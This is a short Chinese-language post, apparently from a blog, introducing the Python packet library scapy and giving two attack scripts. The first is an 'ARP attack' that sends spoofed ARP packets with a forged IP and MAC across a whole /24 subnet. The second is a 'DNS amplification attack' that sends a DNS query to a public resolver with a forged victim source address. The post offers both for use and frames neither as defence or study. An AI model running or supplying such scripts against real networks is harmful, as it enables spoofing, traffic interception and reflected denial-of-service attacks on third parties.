scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。
这里就直接用python的scapy模块开始搞了。
这里是arp的攻击方式,你可以做成arp攻击
#!/usr/bin/python """ ARP attack """ import sys, os from scapy.all import * if os.geteuid() != 0: print "This program must be run as root. Aborting." sys.exit() if len(sys.argv) < 2: print "Pkease Use %s x.x.x" % (sys.argv[0]) exit() attackIP = sys.argv[1] + ".0/24" srploop(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=attackIP, psrc="192.168.1.100", hwsrc="00:66:66:66:66:66"), timeout=2)
dns放大攻击
#coding:utf-8 from scapy import * from scapy.all import * a = IP(dst='8.8.8.8',src='192.168.1.200') #192.168.1.200 为伪造的源ip b = UDP(dport=53) c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0) c.qd=DNSQR(qname='www.qq.com',qtype=1,qclass=1) p = a/b/c send(p) ~